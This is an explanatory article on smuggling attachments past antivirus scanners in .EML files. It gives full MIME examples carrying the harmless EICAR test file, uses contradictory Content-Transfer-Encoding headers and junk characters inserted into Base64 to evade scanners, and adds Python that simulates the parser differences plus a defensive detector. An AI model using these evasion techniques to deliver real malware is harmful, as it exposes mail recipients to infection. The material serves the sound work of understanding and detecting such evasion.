An .EML file is a raw e-mail message, so it can carry anything a mail message can, including viruses, Trojans and worms that could damage your system. Because such files are so easily exchanged, they have become a favorite carrier for attackers.
E-mail has traditionally been transferred as 7-bit ASCII; the MIME standard defines a structured message format on top of it and supports the transport of non-ASCII data. MIME is complex enough that different client and server implementations interpret MIME-encoded messages in different ways. That includes the scanning systems in the delivery path: mail filters, IDS/IPS, mail forwarders, gateways and virus scanners.
The MIME encoding of a message is easy to modify by hand, and so are the attachments encoded inside it. A message can be altered so that an antivirus engine no longer recognizes the attachment while the message still opens normally, attachment included, in clients such as Mozilla Thunderbird or Microsoft Outlook.
Take the following message, which consists of a text body and a .zip attachment encoded in Base64. Saved with the .EML extension, it opens in any e-mail client that reads EML files. The Base64 body decodes to a zip archive whose single member is eicar.com, the standard EICAR antivirus test file, so the examples can be tried without handling real malware:
From: [email protected]
To: [email protected]
Subject: plain
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached
--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64

UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR
CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU
AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA
AAEAAQA3AAAAbQAAAAAA
--foo--
Now add a second content transfer encoding header, "Content-Transfer-Encoding: quoted-printable", so that the attachment part makes contradictory declarations about its encoding. The two declarations are resolved differently by different parsers: a scanner that honors the last one decodes the body as quoted-printable and sees only meaningless text, while a client that honors the first one still decodes Base64. This circumvents attachment parsing in certain virus scanners while the attachment remains visible to the user:
From: [email protected]
To: [email protected]
Subject: plain
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached
--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR
CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU
AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA
AAEAAQA3AAAAbQAAAAAA
--foo--
The Base64 encoding standard (RFC 2045) requires a decoder to ignore characters outside the Base64 alphabet, so junk characters can be sprinkled through the encoded data and a mail client will still decode the attachment. Many antivirus engines do not implement this leniency: their decoders fail on the stray characters, the attachment cannot be reconstructed, and the message reaches the user's mailbox unscanned. Below is the same attachment with a junk character inserted after every Base64 character (the contradictory encoding headers from the previous example are kept as well):
From: [email protected]
To: [email protected]
Subject: plain
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached
--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

U.E.s.D.B.B.Q.A.A.g.A.I.A.B.F.K.j.k.k.8.z.1.F.o.R.g.A.A.A.E.Q.
A.A.A.A.J.A.A.A.A.Z.W.l.j.Y.X.I.u.Y.2.9.t.i.z.D.1.V.w.x.Q.d.X.
A.M.i.D.a.J.C.Y.i.K.M.D.X.R.C.I.j.T.N.H.d.2.1.
j.S.v.V.X.H.1.d.H.Y.M.0.g.0.O.c.f
.R.z.c.Q.x.y.0.X.X.0.C./.E.M.8.w.w.K.D.d.Y.N.c.Q.0.O.0.X.X.z.
9.H.F.V.V.P.H.Q.9.t.A.C.A.F.B.L.A.Q.I.U.
A.x.Q.A.A.g.A.I.A.B.F.K.j.k.k.8.z.1.F.o.R.g.A.A.A.E.Q
.A.A.A.A.J.A.A.A.A.A.A.A.A.A.A.A.A.A.A.C.2.g.Q.A.A.A.A.B.l.a.
W.N.h.c.i.5.j.b.2.1.Q.S.w.U.G.A.A.A.A.
A.A.E.A.A.Q.A.3.A.A.A.A.b.Q.A.A.A.A.A.A.
--foo--
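To make the parser differential behind the two tricks concrete, here is an added example written for this page (it is not code from the original article or from any antivirus product). It rebuilds the three messages above and feeds them to three toy MIME consumers: a client that honors the first Content-Transfer-Encoding header and decodes Base64 leniently, a scanner that honors the last header, and a scanner whose Base64 decoder rejects anything outside the alphabet. The Base64 body is the one from the page; the sender and recipient addresses are placeholders, and the three consumers are simplified models chosen to illustrate the two evasions, not descriptions of specific products. Python's zipfile module reads the recovered archive's central directory, which names the member eicar.com with an uncompressed size of 68 bytes, the EICAR test file.

```python
import base64
import binascii
import io
import quopri
import zipfile

# Base64 body copied from the page: a zip whose only member is eicar.com, the
# 68-byte EICAR antivirus test string (harmless by design). Kept unfolded for brevity.
B64 = (
    "UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR"
    "CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU"
    "AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA"
    "AAEAAQA3AAAAbQAAAAAA"
)
B64_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")

def build_message(cte_lines, encoded_body):
    """Rebuild the page's multipart/mixed message (addresses are placeholders)."""
    return "\r\n".join([
        "From: sender@example.com", "To: victim@example.com", "Subject: plain",
        "Content-type: multipart/mixed; boundary=foo", "",
        "--foo", "Content-type: text/plain", "", "Virus attached",
        "--foo", "Content-type: application/zip; name=whatever.zip", *cte_lines, "",
        encoded_body, "--foo--", "",
    ])

def parse_entity(text):
    """Split an RFC 822 entity into an ordered [(name, value)] header list and a body."""
    head, _, body = text.partition("\r\n\r\n")
    headers = [(n.strip().lower(), v.strip()) for n, sep, v in
               (line.partition(":") for line in head.split("\r\n")) if sep]
    return headers, body

def header(headers, name, policy):
    """Resolve a possibly repeated header; policy 'first' or 'last' says which copy wins."""
    values = [v for n, v in headers if n == name]
    return "" if not values else (values[0] if policy == "first" else values[-1])

def mime_parts(message):
    """Return the body parts of a multipart message, each with its own headers."""
    headers, body = parse_entity(message)
    boundary = header(headers, "content-type", "first").split("boundary=", 1)[1].strip('" ')
    return [c.strip("\r\n") for c in body.split("--" + boundary)[1:-1]]  # drop preamble/epilogue

def decode_base64_lenient(data):
    """RFC 2045 section 6.8 behaviour, as mail clients implement it: skip non-alphabet characters."""
    return base64.b64decode("".join(ch for ch in data if ch in B64_ALPHABET))

def decode_base64_strict(data):
    """A stricter decoder (toy scanner model): line breaks are fine, any other stray character is an error."""
    return base64.b64decode(data.replace("\r\n", ""), validate=True)

def extract_attachment(message, cte_policy, base64_decoder):
    """Recover the zip part the way one particular consumer would (None if no zip part)."""
    for part in mime_parts(message):
        headers, body = parse_entity(part)
        if not header(headers, "content-type", "first").startswith("application/zip"):
            continue
        cte = header(headers, "content-transfer-encoding", cte_policy).lower()
        if cte == "base64":
            return base64_decoder(body)
        if cte == "quoted-printable":
            return quopri.decodestring(body.encode("ascii"))
        return body.encode("ascii")
    return None

def zip_summary(blob):
    """(member name, uncompressed size, CRC-32) read from a one-member zip's central directory, else None."""
    if not blob:
        return None
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            info = zf.infolist()[0]
            return info.filename, info.file_size, info.CRC
    except (zipfile.BadZipFile, IndexError):
        return None

def run_scenarios():
    """Map (message, consumer) -> True when that consumer recovers the zip attachment."""
    b64, qp = "Content-Transfer-Encoding: base64", "Content-Transfer-Encoding: quoted-printable"
    messages = {
        "plain": build_message([b64], B64),
        "duplicate-cte": build_message([b64, qp], B64),                 # page's second example
        "junk-chars": build_message([b64, qp], ".".join(B64)),          # page's third example
    }
    consumers = {  # (which copy of a repeated header wins, Base64 decoder); toy models, not products
        "client": ("first", decode_base64_lenient),
        "scanner-last-cte": ("last", decode_base64_lenient),
        "scanner-strict-b64": ("first", decode_base64_strict),
    }
    results = {}
    for mname, message in messages.items():
        for cname, (policy, decoder) in consumers.items():
            try:
                blob = extract_attachment(message, policy, decoder)
            except binascii.Error:  # the strict decoder rejects the junk characters
                blob = None
            results[(mname, cname)] = zip_summary(blob) is not None
    return results
```

The client recovers the archive from all three messages. The last-header scanner loses it as soon as the quoted-printable declaration is added, and the strict scanner loses it once junk characters appear. For a filter the lesson is that any disagreement between plausible parses of the same part is itself the signal to act on.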
This shows how little effort it takes to use a file with an EML extension to smuggle malware past a scanner and onto a receiving system. Preventive measures are therefore necessary, especially wherever such files are shared: a scanner that finds contradictory encoding headers, or characters outside the Base64 alphabet in a Base64 body, should treat the message as suspicious rather than guess at one interpretation.
For more details on how MIME can be manipulated to smuggle viruses, see the page "Five Easy Steps to Bypass Antivirus using manipulated MIME".
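A gateway-side check for the two ambiguities above, as an added example that is not the original page's code: it uses Python's standard email package, whose get_all() keeps every copy of a repeated header (get() would silently return one and hide the conflict), and it flags stray characters in a Base64 body instead of skipping them the way a client does. The messages it audits are constructed here in the shape of the page's examples, with placeholder addresses and a placeholder Base64 body rather than the page's archive.

```python
import base64
import email
import re

# Anything outside the Base64 alphabet and whitespace. RFC 2045 lets a decoder
# skip such characters, which is exactly why a filter should flag them instead.
STRAY_B64 = re.compile(r"[^A-Za-z0-9+/=\s]")


def mime_anomalies(raw_message):
    """List the reasons a gateway should quarantine a message rather than trust its own parse."""
    msg = email.message_from_string(raw_message)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        label = part.get_param("name") or part.get_content_type()
        # get_all keeps every copy of a repeated header; get() would hide the conflict
        ctes = [v.strip().lower() for v in part.get_all("Content-Transfer-Encoding", [])]
        if len(ctes) > 1:
            findings.append(f"{label}: repeated Content-Transfer-Encoding headers {ctes}")
        if ctes and ctes[0] == "base64":
            stray = STRAY_B64.findall(part.get_payload())  # raw, undecoded body text
            if stray:
                findings.append(f"{label}: {len(stray)} non-Base64 characters in Base64 body")
    return findings


# Constructed message in the shape of the page's examples; addresses are placeholders.
TEMPLATE = (
    "From: sender@example.com\nTo: victim@example.com\nSubject: plain\nMIME-Version: 1.0\n"
    "Content-type: multipart/mixed; boundary=foo\n\n--foo\nContent-type: text/plain\n\n"
    "Virus attached\n--foo\nContent-type: application/zip; name=whatever.zip\n{cte}\n\n"
    "{body}\n--foo--\n"
)
# Constructed stand-in for the attachment: deterministic bytes, not the page's archive.
CLEAN_B64 = base64.b64encode(b"PK\x03\x04 placeholder archive bytes for this demo").decode()
CTE_B64 = "Content-Transfer-Encoding: base64"
CTE_QP = "Content-Transfer-Encoding: quoted-printable"


def audit_examples():
    """Run the check over the three message shapes shown on this page."""
    both = CTE_B64 + "\n" + CTE_QP
    return {
        "plain": mime_anomalies(TEMPLATE.format(cte=CTE_B64, body=CLEAN_B64)),
        "duplicate-cte": mime_anomalies(TEMPLATE.format(cte=both, body=CLEAN_B64)),
        "junk-chars": mime_anomalies(TEMPLATE.format(cte=both, body=".".join(CLEAN_B64))),
    }
```

The plain message produces no findings, the duplicate-header message produces one, and the junk-character message produces two. A filter that quarantines on any finding never has to decide which of the competing parses the recipient's client will choose.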
| EML Quick Info | |
|---|---|
| Description | Email message in RFC 822 format |
| MIME Type | message/rfc822 |
| Opens with | Mozilla Thunderbird, Microsoft Outlook Express, Microsoft Outlook, EncryptoMatic EML Viewer, EML Viewer |